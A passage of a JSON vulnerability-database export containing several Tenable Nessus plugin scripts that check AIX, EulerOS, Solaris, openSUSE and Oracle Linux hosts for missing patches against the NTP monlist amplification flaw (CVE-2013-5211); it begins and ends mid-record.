script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/AIX/lslpp\", \"Host/local_checks_enabled\", \"Host/AIX/version\");\n\n exit(0);\n}\n\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"aix.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif ( ! get_kb_item(\"Host/AIX/version\") ) audit(AUDIT_OS_NOT, \"AIX\");\nif ( ! get_kb_item(\"Host/AIX/lslpp\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nif ( get_kb_item(\"Host/AIX/emgr_failure\" ) ) exit(0, \"This iFix check is disabled because : \"+get_kb_item(\"Host/AIX/emgr_failure\") );\n\nflag = 0;\n\nif (aix_check_ifix(release:\"7.1\", ml:\"02\", sp:\"04\", patch:\"IV55365s4a\", package:\"bos.net.tcp.client\", minfilesetver:\"7.1.2.0\", maxfilesetver:\"7.1.2.17\") < 0) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:aix_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:57:44", "description": "According to the version of the ntp packages installed, the EulerOS installation on the remote host is affected by the following vulnerability :\n\n - The monlist feature in ntp_request.c in ntpd in NTP before 4.2.7p26 allows remote attackers to cause a denial of service (traffic amplification) via forged (1) REQ_MON_GETLIST or (2) REQ_MON_GETLIST_1 requests, as exploited in the wild in December 2013.(CVE-2013-5211)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the EulerOS security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2020-03-23T00:00:00", "type": "nessus", "title": "EulerOS 2.0 SP5 : ntp (EulerOS-SA-2020-1314)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-5211"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:huawei:euleros:ntp", "p-cpe:/a:huawei:euleros:ntpdate", "p-cpe:/a:huawei:euleros:sntp", "cpe:/o:huawei:euleros:2.0"], "id": "EULEROS_SA-2020-1314.NASL", "href": "https://www.tenable.com/plugins/nessus/134805", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(134805);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\n \"CVE-2013-5211\"\n );\n script_bugtraq_id(\n 64692\n );\n\n script_name(english:\"EulerOS 2.0 SP5 : ntp (EulerOS-SA-2020-1314)\");\n script_summary(english:\"Checks the rpm output for the updated package.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the version of the ntp packages installed, the EulerOS\ninstallation on the remote host is affected by the following\nvulnerability :\n\n - The monlist feature in ntp_request.c in ntpd in NTP\n before 4.2.7p26 allows remote attackers to cause a\n denial of service (traffic amplification) via forged\n (1) REQ_MON_GETLIST or (2) REQ_MON_GETLIST_1 requests,\n as exploited in the wild in December\n 2013.(CVE-2013-5211)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2020-1314\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?3885e27d\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected ntp package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/03/23\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/03/23\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:ntp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:ntpdate\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:sntp\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:2.0\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/sp\");\n script_exclude_keys(\"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nif (release !~ \"^EulerOS release 2\\.0(\\D|$)\") audit(AUDIT_OS_NOT, \"EulerOS 2.0\");\n\nsp = get_kb_item(\"Host/EulerOS/sp\");\nif (isnull(sp) || sp !~ \"^(5)$\") audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP5\");\n\nuvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (!empty_or_null(uvp)) audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP5\", \"EulerOS UVP \" + uvp);\n\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"aarch64\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_ARCH_NOT, \"i686 / x86_64\", cpu);\n\nflag = 0;\n\npkgs = [\"ntp-4.2.6p5-28.h13.eulerosv2r7\",\n \"ntpdate-4.2.6p5-28.h13.eulerosv2r7\",\n \"sntp-4.2.6p5-28.h13.eulerosv2r7\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", sp:\"5\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"ntp\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-19T14:26:16", "description": "The monlist feature in ntpd in NTP allows remote attackers to cause a denial of service (traffic amplification) via forged (1) REQ_MON_GETLIST or (2) REQ_MON_GETLIST_1 requests.", "cvss3": {}, "published": "2014-06-17T00:00:00", "type": "nessus", "title": "AIX 5.3 TL 12 : ntp (IV59636)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-5211"], "modified": "2023-04-21T00:00:00", "cpe": ["cpe:/o:ibm:aix:5.3"], "id": "AIX_IV59636.NASL", "href": "https://www.tenable.com/plugins/nessus/76080", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The text in the description was extracted from AIX Security\n# Advisory ntp_advisory.asc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(76080);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/04/21\");\n\n script_cve_id(\"CVE-2013-5211\");\n\n script_name(english:\"AIX 5.3 TL 12 : ntp (IV59636)\");\n script_summary(english:\"Check for APAR IV59636\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote AIX host is missing a security patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The monlist feature in ntpd in NTP allows remote attackers to cause a\ndenial of service (traffic amplification) via forged (1)\nREQ_MON_GETLIST or (2) REQ_MON_GETLIST_1 requests.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://aix.software.ibm.com/aix/efixes/security/ntp_advisory.asc\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Install the appropriate interim fix.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:ibm:aix:5.3\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/06/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/06/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/06/17\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2023 Tenable Network Security, Inc.\");\n script_family(english:\"AIX Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/AIX/lslpp\", \"Host/local_checks_enabled\", \"Host/AIX/version\");\n\n exit(0);\n}\n\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"aix.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif ( ! get_kb_item(\"Host/AIX/version\") ) audit(AUDIT_OS_NOT, \"AIX\");\nif ( ! get_kb_item(\"Host/AIX/lslpp\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nif ( get_kb_item(\"Host/AIX/emgr_failure\" ) ) exit(0, \"This iFix check is disabled because : \"+get_kb_item(\"Host/AIX/emgr_failure\") );\n\nflag = 0;\n\nif (aix_check_ifix(release:\"5.3\", ml:\"12\", sp:\"09\", patch:\"IV59636s9a\", package:\"bos.net.tcp.client\", minfilesetver:\"5.3.12.0\", maxfilesetver:\"5.3.12.10\") < 0) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:aix_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:09:54", "description": "The remote Solaris system is missing necessary patches to address security updates :\n\n - The monlist feature in ntp_request.c in ntpd in NTP before 4.2.7p26 allows remote attackers to cause a denial of service (traffic amplification) via forged (1) REQ_MON_GETLIST or (2) REQ_MON_GETLIST_1 requests, as exploited in the wild in December 2013. (CVE-2013-5211)", "cvss3": {}, "published": "2015-01-19T00:00:00", "type": "nessus", "title": "Oracle Solaris Third-Party Patch Update : ntp (cve_2013_5211_input_validation)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-5211"], "modified": "2021-01-14T00:00:00", "cpe": ["cpe:/o:oracle:solaris:11.1", "p-cpe:/a:oracle:solaris:ntp"], "id": "SOLARIS11_NTP_20140417.NASL", "href": "https://www.tenable.com/plugins/nessus/80714", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from the Oracle Third Party software advisories.\n#\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(80714);\n script_version(\"1.3\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2013-5211\");\n\n script_name(english:\"Oracle Solaris Third-Party Patch Update : ntp (cve_2013_5211_input_validation)\");\n script_summary(english:\"Check for the 'entire' version.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Solaris system is missing a security patch for third-party\nsoftware.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote Solaris system is missing necessary patches to address\nsecurity updates :\n\n - The monlist feature in ntp_request.c in ntpd in NTP\n before 4.2.7p26 allows remote attackers to cause a\n denial of service (traffic amplification) via forged (1)\n REQ_MON_GETLIST or (2) REQ_MON_GETLIST_1 requests, as\n exploited in the wild in December 2013. (CVE-2013-5211)\"\n );\n # https://www.oracle.com/technetwork/topics/security/thirdparty-patch-map-1482893.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?4a913f44\"\n );\n # https://blogs.oracle.com/sunsecurity/cve-2013-5211-input-validation-vulnerability-in-ntp\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?71f18057\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Upgrade to Solaris 11.1.13.6.0.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:solaris:11.1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:ntp\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/04/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/01/19\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Solaris Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Solaris11/release\", \"Host/Solaris11/pkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"solaris.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Solaris11/release\");\nif (isnull(release)) audit(AUDIT_OS_NOT, \"Solaris11\");\npkg_list = solaris_pkg_list_leaves();\nif (isnull (pkg_list)) audit(AUDIT_PACKAGE_LIST_MISSING, \"Solaris pkg-list packages\");\n\nif (empty_or_null(egrep(string:pkg_list, pattern:\"^ntp$\"))) audit(AUDIT_PACKAGE_NOT_INSTALLED, \"ntp\");\n\nflag = 0;\n\nif (solaris_check_release(release:\"0.5.11-0.175.1.13.0.6.0\", sru:\"SRU 11.1.13.6.0\") > 0) flag++;\n\nif (flag)\n{\n error_extra = 'Affected package : ntp\\n' + solaris_get_report2();\n error_extra = ereg_replace(pattern:\"version\", replace:\"OS version\", string:error_extra);\n if (report_verbosity > 0) security_warning(port:0, extra:error_extra);\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_PACKAGE_NOT_AFFECTED, \"ntp\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:21:17", "description": "The monlist feature in ntpd in NTP allows remote attackers to cause a denial of service (traffic amplification) via forged (1) REQ_MON_GETLIST or (2) REQ_MON_GETLIST_1 requests.", "cvss3": {}, "published": "2014-06-17T00:00:00", "type": "nessus", "title": "AIX 7.1 TL 3 : ntp (IV56324)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-5211"], "modified": "2023-04-21T00:00:00", "cpe": ["cpe:/o:ibm:aix:7.1"], "id": "AIX_IV56324.NASL", "href": "https://www.tenable.com/plugins/nessus/76076", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The text in the description was extracted from AIX Security\n# Advisory ntp_advisory.asc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(76076);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/04/21\");\n\n script_cve_id(\"CVE-2013-5211\");\n\n script_name(english:\"AIX 7.1 TL 3 : ntp (IV56324)\");\n script_summary(english:\"Check for APAR IV56324\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote AIX host is missing a security patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The monlist feature in ntpd in NTP allows remote attackers to cause a\ndenial of service (traffic amplification) via forged (1)\nREQ_MON_GETLIST or (2) REQ_MON_GETLIST_1 requests.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://aix.software.ibm.com/aix/efixes/security/ntp_advisory.asc\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Install the appropriate interim fix.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:ibm:aix:7.1\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/06/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/06/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/06/17\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2023 Tenable Network Security, Inc.\");\n script_family(english:\"AIX Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/AIX/lslpp\", \"Host/local_checks_enabled\", \"Host/AIX/version\");\n\n exit(0);\n}\n\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"aix.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif ( ! get_kb_item(\"Host/AIX/version\") ) audit(AUDIT_OS_NOT, \"AIX\");\nif ( ! get_kb_item(\"Host/AIX/lslpp\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nif ( get_kb_item(\"Host/AIX/emgr_failure\" ) ) exit(0, \"This iFix check is disabled because : \"+get_kb_item(\"Host/AIX/emgr_failure\") );\n\nflag = 0;\n\nif (aix_check_ifix(release:\"7.1\", ml:\"03\", sp:\"02\", patch:\"IV56324s2a\", package:\"bos.net.tcp.client\", minfilesetver:\"7.1.3.0\", maxfilesetver:\"7.1.3.2\") < 0) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:aix_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:22:42", "description": "The NTP time service could be used for remote denial of service amplification attacks.\n\nThis issue can be fixed by the administrator as we described in our security advisory SUSE-SA:2014:001 http://lists.opensuse.org/opensuse-security-announce/2014-01/msg00005.\nhtml\n\nand on http://support.novell.com/security/cve/CVE-2013-5211.html\n\nThis update now also replaces the default ntp.conf template to fix this problem.\n\nPlease note that if you have touched or modified ntp.conf yourself, it will not be automatically fixed, you need to merge the changes manually as described.", "cvss3": {}, "published": "2014-07-31T00:00:00", "type": "nessus", "title": "openSUSE Security Update : openSUSE-2014- (openSUSE-2014--1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-5211"], "modified": "2014-08-08T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:ntp", "p-cpe:/a:novell:opensuse:ntp-debuginfo", "p-cpe:/a:novell:opensuse:ntp-debugsource", "cpe:/o:novell:opensuse:12.3"], "id": "SUSE_12_3_OPENSUSE-2014--140722.NASL", "href": "https://www.tenable.com/plugins/nessus/76930", "sourceData": "#%NASL_MIN_LEVEL 999999\n\n# @DEPRECATED@\n#\n# This script has been deprecated as the associated patch is not\n# currently a security fix.\n#\n# Disabled on 2014/08/08.\n#\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2014--1.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(76930);\n script_version(\"1.3\");\n script_cvs_date(\"Date: 2018/07/20 0:18:55\");\n\n script_cve_id(\"CVE-2013-5211\");\n\n script_name(english:\"openSUSE Security Update : openSUSE-2014- (openSUSE-2014--1)\");\n script_summary(english:\"Check for the openSUSE-2014--1 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The NTP time service could be used for remote denial of service\namplification attacks.\n\nThis issue can be fixed by the administrator as we described in our\nsecurity advisory SUSE-SA:2014:001\nhttp://lists.opensuse.org/opensuse-security-announce/2014-01/msg00005.\nhtml\n\nand on http://support.novell.com/security/cve/CVE-2013-5211.html\n\nThis update now also replaces the default ntp.conf template to fix\nthis problem.\n\nPlease note that if you have touched or modified ntp.conf yourself, it\nwill not be automatically fixed, you need to merge the changes\nmanually as described.\"\n );\n # http://lists.opensuse.org/opensuse-security-announce/2014-01/msg00005.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?cf39e777\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-5211.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=857195\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected openSUSE-2014- packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'NTP Monitor List Scanner');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ntp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ntp-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ntp-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:12.3\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/07/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/07/31\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2018 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n# Deprecated.\nexit(0, \"The associated patch is not currently a security fix.\");\n\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE12\\.3)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"12.3\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE12.3\", reference:\"ntp-4.2.6p5-9.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"ntp-debuginfo-4.2.6p5-9.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"ntp-debugsource-4.2.6p5-9.6.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"ntp\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-19T14:27:11", "description": "The monlist feature in ntpd in NTP allows remote attackers to cause a denial of service (traffic amplification) via forged (1) REQ_MON_GETLIST or (2) REQ_MON_GETLIST_1 requests.", "cvss3": {}, "published": "2014-06-17T00:00:00", "type": "nessus", "title": "AIX 7.1 TL 1 : ntp (IV56575)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-5211"], "modified": "2023-04-21T00:00:00", "cpe": ["cpe:/o:ibm:aix:7.1"], "id": "AIX_IV56575.NASL", "href": "https://www.tenable.com/plugins/nessus/76077", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The text in the description was extracted from AIX Security\n# Advisory ntp_advisory.asc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(76077);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/04/21\");\n\n script_cve_id(\"CVE-2013-5211\");\n\n script_name(english:\"AIX 7.1 TL 1 : ntp (IV56575)\");\n script_summary(english:\"Check for APAR IV56575\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote AIX host is missing a security patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The monlist feature in ntpd in NTP allows remote attackers to cause a\ndenial of service (traffic amplification) via forged (1)\nREQ_MON_GETLIST or (2) REQ_MON_GETLIST_1 requests.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://aix.software.ibm.com/aix/efixes/security/ntp_advisory.asc\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Install the appropriate interim fix.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:ibm:aix:7.1\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/06/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/06/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/06/17\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2023 Tenable Network Security, Inc.\");\n script_family(english:\"AIX Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/AIX/lslpp\", \"Host/local_checks_enabled\", \"Host/AIX/version\");\n\n exit(0);\n}\n\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"aix.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif ( ! get_kb_item(\"Host/AIX/version\") ) audit(AUDIT_OS_NOT, \"AIX\");\nif ( ! get_kb_item(\"Host/AIX/lslpp\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nif ( get_kb_item(\"Host/AIX/emgr_failure\" ) ) exit(0, \"This iFix check is disabled because : \"+get_kb_item(\"Host/AIX/emgr_failure\") );\n\nflag = 0;\n\nif (aix_check_ifix(release:\"7.1\", ml:\"01\", sp:\"09\", patch:\"IV56575s9a\", package:\"bos.net.tcp.client\", minfilesetver:\"7.1.1.0\", maxfilesetver:\"7.1.1.20\") < 0) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:aix_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:27:36", "description": "Description of changes:\n\n[4.2.6p5-10.0.1.el6_8.1]\n- add disable monitor to default ntp.conf [CVE-2013-5211]", "cvss3": {}, "published": "2016-09-13T00:00:00", "type": "nessus", "title": "Oracle Linux 6 : ntp (ELSA-2016-3613)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-5211"], "modified": "2021-01-14T00:00:00", "cpe": ["p-cpe:/a:oracle:linux:ntp", "p-cpe:/a:oracle:linux:ntp-doc", "p-cpe:/a:oracle:linux:ntp-perl", "p-cpe:/a:oracle:linux:ntpdate", "cpe:/o:oracle:linux:6"], "id": "ORACLELINUX_ELSA-2016-3613.NASL", "href": "https://www.tenable.com/plugins/nessus/93449", "sourceData": 